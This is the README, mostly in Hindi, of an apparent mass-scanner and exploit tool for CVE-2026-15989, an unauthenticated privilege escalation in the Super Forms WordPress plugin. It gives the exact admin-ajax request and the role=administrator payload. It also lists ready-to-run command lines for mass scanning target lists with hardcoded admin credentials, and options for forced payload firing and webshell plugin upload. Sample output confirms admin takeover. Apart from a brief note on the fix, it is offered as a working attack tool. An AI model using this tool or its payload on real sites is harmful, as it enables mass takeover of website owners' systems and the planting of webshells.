
CVE-2026-15989 के लिए मास स्कैनर और एक्सप्लॉइट, जो Super Forms <= 6.3.316 में अनऑथेंटिकेटेड प्रिविलेज एस्केलेशन है और role पैरामीटर के माध्यम से एडमिनिस्ट्रेटर अकाउंट बनाता है।
Super Forms – Drag & Drop Form Builder (WordPress) ≤ 6.3.316 — प्रीमियम Register & Login ऐड-ऑन के role पैरामीटर के माध्यम से अनधिकृत विशेषाधिकार वृद्धि।
| विशेषता | विवरण |
|---|---|
| CVE ID | CVE-2026-15989 |
| श्रृंखला | पंजीकरण फ़ॉर्म → $other_userdata में 'role' → wp_insert_user(role=administrator) → ADMIN |
| गंभीरता | 🔴 CRITICAL (CVSS 9.8) |
| लक्ष्य | Super Forms – Drag & Drop Form Builder + प्रीमियम Register & Login ऐड-ऑन |
| प्रभावित | ≤ 6.3.316 (कोर) — भेद्य ऐड-ऑन बिल्ड (v1.x) |
| ठीक किया गया | 6.3.317 |
| प्रमाणीकरण आवश्यक | कोई नहीं |
ऐड-ऑन फ़ॉर्म सेटिंग्स से नए उपयोगकर्ता की भूमिका सेट करता है
($userdata['role'] = $settings['register_user_role']), फिर $other_userdata पर लूप करता है — जिसमें 'role' शामिल है — और wp_insert_user() को कॉल करने से पहले किसी भी कुंजी को क्लाइंट-प्रदत्त मान ($data['role']['value']) से अधिलेखित कर देता है।
POST /wp-admin/admin-ajax.php (unauthenticated)
│
▼
action=super_submit_form + data={"role":{"value":"administrator"}, ...}
│
▼
$other_userdata loop ─► $userdata['role'] = $data['role']['value']
│
▼
wp_insert_user() ─► administrator account created
│
▼
register_login_activation='login'/'auto' ─► wp_set_auth_cookie ─► admin session
फ़िक्स (6.3.317): व्हाइटलिस्ट से 'role' हटाया गया + get_safe_public_registration_role() (fail-closed)।
मूल शोध — दोहरी सबमिट प्रोटोकॉल: कोर ने v5.0.0 पर प्रोटोकॉल बदल दिया।
| कोर | क्रिया | डेटा प्रारूप | Nonce |
|---|---|---|---|
| 4.x | super_send_email | नेस्टेड फ़ील्ड (data[role][value]=...) | कोई नहीं (जाँच टिप्पणीबद्ध) |
| 5.x/6.x | super_submit_form | JSON स्ट्रिंग | sf_nonce super_create_nonce के माध्यम से |
टूल पता लगाए गए संस्करण से प्रोटोकॉल स्वचालित रूप से चुनता है।
# mass scan + exploit
python CVE-2026-15989.py --list targets.txt --threads 10 --force --only-hits --results hits.txt --user Floydroot --password 'Floyd@2026!root'
python CVE-2026-15989.py --list targets.txt --threads 15 --timeout 6 --force --quiet --results hits.txt --user U --password P --no-dedup
# single target
python CVE-2026-15989.py --target TARGET --port 443 --user USER --password PASS --email EMAIL --insecure
python CVE-2026-15989.py --target TARGET --port 443 --user USER --password PASS --login --rce --insecure
# re-check an existing account without re-registering
python CVE-2026-15989.py --target TARGET --port 443 --user USER --password PASS --only-login --insecure
| विकल्प | विवरण |
|---|---|
--list FILE | प्रति पंक्ति एक लक्ष्य; प्रति पंक्ति URL|form_id या URL|form_id=ID,email=X |
-u/--target, --port | एकल लक्ष्य |
--threads, --timeout, --no-dedup | मास मोड ट्यूनिंग |
--force | पता लगाए गए पंजीकरण फ़ॉर्म के बिना भी पेलोड फायर करें |
--only-hits / --quiet | केवल पुष्ट हिट के लिए ट्री / न्यूनतम आउटपुट |
--reset | lost-password के माध्यम से verify-mode पूर्णता (ऑपरेटर रीसेट लिंक पेस्ट करता है) |
--only-login | पंजीकरण छोड़ें; लॉग इन करें और users/me के माध्यम से भूमिका जाँचें |
--login / --rce | वास्तविक-लक्ष्य पोस्ट-एक्सप्लॉइटेशन: लॉगिन प्रमाण / webshell प्लगइन अपलोड |
-k/--insecure | TLS अनदेखा करें |
│ ├─ plugin : 6.3.316 — VULNERABLE <= 6.3.316
│ ├─ addon : v1.8.7
│ ├─ form : 4169 (/register/)
│ ├─ proto : 5.x/6.x (super_submit_form, JSON, sf_nonce)
│ ├─ payload : HTTP 200 ✓ processed
│ └─ session : cookie ✓ · admin confirmed — Floydroot/Floyd@2026!root
└─── ✔ ADMIN CONFIRMED
hits.txt — केवल पुष्ट लक्ष्य (ts|url|status|detail, उपयोगकर्ता/पासवर्ड के साथ)readme.txt Stable tag + common.js?ver=; ऐड-ऑन प्रोब + इसका स्वयं का संस्करण/wp-json/wp/v2/users/me?context=edit के माध्यम से आधिकारिक एडमिन प्रमाण (फ़ॉलबैक: users.php / dashboard)├── CVE-2026-15989.py # mass scanner + exploit
├── README.md
├── LICENSE
└── .gitignore
╔══════════════════════════════════════════════════════════════════╗
║ LEGAL DISCLAIMER ║
╠══════════════════════════════════════════════════════════════════╣
║ This tool is provided for EDUCATIONAL and AUTHORIZED ║
║ SECURITY TESTING purposes only. ║
║ Only use on systems you own or have explicit permission. ║
║ The author is NOT responsible for any misuse or damage. ║
╚══════════════════════════════════════════════════════════════════╝
wp-admin/ उपयोगकर्ताओं का ऑडिट करें